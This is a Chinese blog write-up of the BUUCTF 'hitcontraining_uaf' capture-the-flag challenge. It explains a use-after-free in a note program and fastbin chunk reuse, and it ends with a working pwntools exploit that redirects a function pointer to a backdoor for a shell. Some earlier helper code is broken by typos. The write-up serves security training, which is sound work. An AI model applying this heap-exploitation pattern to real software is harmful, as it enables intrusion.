hitcontraining_uaf【write up】

最新推荐文章于 2023-04-12 09:12:15 发布
最新推荐文章于 2023-04-12 09:12:15 发布
阅读量111 收藏 2
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/128760549
版权

hitcontraining_uaf

惯例先checksec一下

请添加图片描述

开启了nx保护的32位程序 放进ida里看看

没什么营养的main函数

请添加图片描述

进menu里看看

输入1添加堆 2删除堆 3打印堆 4退出 内心对这些有点数 依次进去看看

请添加图片描述

首先是1 添加堆

可以发现当result>5时会打印full并无法添加堆 通过尝试我们可以得到最多添加5个堆

首先 我们会存储到一个数组notelist中如果notelist中没有空余位置 则直接退出

如果有的话则malloc一个8字节的堆

前四字节存储print_note_content

print_note_content作用为打印后四字节所存储的内容

请添加图片描述

后四字节存储 新malloc所想要的size的堆的地址

v1 = *((_DWORD *)&notelist + i);
*(_DWORD *)(v1 + 4) = malloc(size);

请添加图片描述

接下来让我们来看2 删除堆

我们发现删除堆free了两个堆但是却没有将指针删除 因此我们可以联想到use after free漏洞 也就时题目中为我们指明的uaf

请添加图片描述

3打印堆

注意:此处的打印堆实际上是执行noteliste中的堆而非直接打印

请添加图片描述

后门函数

请添加图片描述

审题完成 开始解题

由于每次都重复输入很麻烦 我们选择利用定义函数来帮助我们 即def

添加堆:

def new(lenth,cmd):
    io.recvuntil('Your choice :')
    io,sendline('1')
    io.recvuntil('Note size :')
    io.sendline(lenth)
    io,recvuntil('Content :')
    io.sendline(cmd)

删除堆

def delete(cmd):
    io.recvuntil('Your choice :')
    io,sendline('2')
    io.recvuntil('Index :')
    io.sendline(cmd)

打印堆(用于执行)

def print(cmd):
    io.recvuntil('Your choice :')
    io,sendline('3')
    io.recvuntil('Index :')
    io.sendline(str(cmd).encode())

首先我们先申请两遍长度为16的堆

然后将他们删除(注意:此时0和1的执针并没有被删除)

然后再申请一个大小为8的堆 则0上面的内容被程序误认为是要填入数据的段 堆2的数据段和堆0的控制段指向了同一片区域 我们就可以利用堆2篡改堆0上的内容

注意:此处需要我们了解到fastbin是后进先出的 所以堆1的控制端为堆2的控制段 堆0的控制段位堆2的数据段

将其篡改为我们的后门函数 再利用打印段来执行我们的后门函数 成功获取到flag

请添加图片描述

exp:

from pwn import *
from LibcSearcher import *
io=remote('node4.buuoj.cn',26369)
elf=ELF('./hacknote')

def new(lenth,cmd):
    io.recvuntil('Your choice :')
    io.sendline('1')
    io.recvuntil('Note size :')
    io.sendline(lenth)
    io.recvuntil('Content :')
    io.sendline(cmd)
    
def delete(cmd):
    io.recvuntil('Your choice :')
    io.sendline('2')
    io.recvuntil('Index :')
    io.sendline(cmd)
    
def print_0(cmd):
    io.recvuntil('Your choice :')
    io.sendline('3')
    io.recvuntil('Index :')
    io.sendline(str(cmd))

new('16','a'*8)
new('16','a'*8)
delete('0')
delete('1')
new('8',p32(0x8048945)+p32(0x0))
print_0(0)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 916
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
2021_UAF_SE_Nhom06
03-20
2021_UAF_SE_Nhom06
hitcontraining_uaf
m0sway的博客
11-27 226
hitcontraining_uaf 使用checksec查看: 看题目名,应该是用UAF去解题 拉进IDA中看下add函数: 可以发现,add一个note会malloc两个堆,第一个堆不可控,大小默认为0x8,储存函数。第二个堆是用户可控的context。 本来是想看Edit函数的,结果发现这个程序并没有这个函数,给的是print: print调用的是add_note中第一个chunk指针指向的内容,也就是print_note_content进行输出操作。 那就只能从print_note_conte
[BUUCTF-pwn]——hitcontraining_uaf
Y_peak的博客
03-10 314
[BUUCTF-pwn]——hitcontraining_uaf 题目地址:https://buuoj.cn/challenges#hitcontraining_uaf 题目给了提示,一个利用UAF漏洞的题目 还是先checksec一下 在IDA中,三个比较关键的函数 我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1) delete则会将刚才申请的两块空间给删除(count不会减一
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
使用uaf42设计的有源滤波器,高通滤波器的设计参数记录
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS 没有自动化测试非最终产品(仅用于通过FIDO认证测试套件)-不进行代码审查-不进行渗透测试运行测试建于贡献请阅读以获取有关我们的行为准则...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
eID_fido-uaf-core
05-14
eID_fido-uaf-core
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 300
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 1600
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
hitcontrainingUAF之我见
TedLau的博客
06-16 263
hictontrainingUAF,太菜学了几天才懂这里的门道。我觉得我理解了这个题...继续学吧!
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 224
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
buu|hitcontraining_uaf 1
m0_64236521的博客
07-09 149
hitcontraining_uaf 1 这里一次会申请两个堆,其中第一个堆放着print_note_content 前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中 在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可 申请两个堆块儿 释放掉 0x10里有两个堆,都是之前存...
hitcontraining_uaf[use after free]
、moddemod
07-02 279
比较简单,直接留了后门! exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add_note(size, context): p.sendlineafter('choice :', str(1)) p.sendlineafter('size :', str(size)) p.sendafter('Con.
uaf pwn hacknote
最新发布
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值